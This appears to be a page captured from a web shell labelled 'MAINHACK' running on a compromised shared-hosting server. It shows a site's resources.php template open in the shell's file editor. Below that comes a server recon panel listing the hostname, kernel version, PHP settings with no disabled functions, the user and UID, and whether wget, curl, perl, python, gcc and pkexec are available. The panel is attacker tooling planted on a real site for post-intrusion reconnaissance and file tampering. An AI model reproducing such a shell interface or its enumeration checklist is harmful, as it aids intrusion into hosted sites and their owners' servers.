[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: resources.php
<!-- Header include --> <?php include("header.php"); ?> <!-- Inner Banner --> <div class="inner-banner"> <img src="images/inner-banner-6.png" alt=""> <div class="inner-banner-block"> <div class="container"> <h1 class="inner-head">Resources</h1> <div class="inner-nav"> <ul> <li><a href="index.php">Home</a></li> <li>//</li> <li>Resources</li> </ul> </div> </div> </div> </div> <!-- Resources Start --> <div class="resources"> <div class="container"> <h2>Resources</h2> <p>Position yourselves as thought leaders + SEO benefits.</p> <div class="row"> <div class="col-md-7 col-sm-7 col-xs-12" data-aos="fade-right" style="transition: all 1800ms ease-in-out;"> <?php $count=1; $sr='resource'; $stmt =$show->readAll_clause($sr,'order by id asc'); $num = $stmt->rowCount(); if($num>0){ $count=1; while ($row = $stmt->fetch(PDO::FETCH_ASSOC)){ extract($row); $id=$row['id']; ?> <button class="accordion"><?=$row['name']?></button> <div class="accordion-content"> <?=htmlspecialchars_decode($row['description'])?> </div> <?php } }?> </div> <div class="col-md-5 col-sm-5 col-xs-12"> <div class="resources-right-content" data-aos="fade-left" style="transition: all 1800ms ease-in-out;"> <img src="images/faq-img.png" alt=""> </div> </div> </div> </div> </div> <!-- Testimonial --> <!-- <div class="testimonial"> <div class="container"> <h2>Client <span>Testimonial</span></h2> <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.</p> <div class="row"> <div class="col-md-8 col-sm-6 col-xs-12"> <div id="testimonial-slider" class="owl-carousel" data-aos="fade-left" style="transition: all 1500ms ease-in-out;"> <div class="item"> <div class="testimonial-block"> <div class="top-block"> <div class="top-left-block"> <h4>Excellent</h4> <div class="rating-star"> <ul> <li><i class="fa-solid fa-star"></i></li> <li><i class="fa-solid fa-star"></i></li> <li><i class="fa-solid fa-star"></i></li> <li><i class="fa-solid fa-star"></i></li> <li><i class="fa-regular fa-star"></i></li> </ul> </div> </div> <div class="top-right-block"> <i class="fa-solid fa-quote-left"></i> </div> </div> <div class="testimonial-middle-content"> <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.</p> </div> <div class="testimonial-profile"> <div class="profile-left"> <i class="fa-solid fa-user"></i> </div> <h5>Raja Sarkar</h5> </div> </div> </div> <div class="item"> <div class="testimonial-block"> <div class="top-block"> <div class="top-left-block"> <h4>Excellent</h4> <div class="rating-star"> <ul> <li><i class="fa-solid fa-star"></i></li> <li><i class="fa-solid fa-star"></i></li> <li><i class="fa-solid fa-star"></i></li> <li><i class="fa-solid fa-star"></i></li> <li><i class="fa-regular fa-star"></i></li> </ul> </div> </div> <div class="top-right-block"> <i class="fa-solid fa-quote-left"></i> </div> </div> <div class="testimonial-middle-content"> <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.</p> </div> <div class="testimonial-profile"> <div class="profile-left"> <i class="fa-solid fa-user"></i> </div> <h5>Raja Sarkar</h5> </div> </div> </div> </div> </div> <div class="col-md-4 col-sm-6 col-xs-12"> <div class="testimonial-right-content" data-aos="fade-right" style="transition: all 1800ms ease-in-out;"> <img src="images/testimonial-image.png" alt=""> </div> </div> </div> </div> </div> --> <!-- Footer include --> <?php include("footer.php"); ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 678.08 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: 1619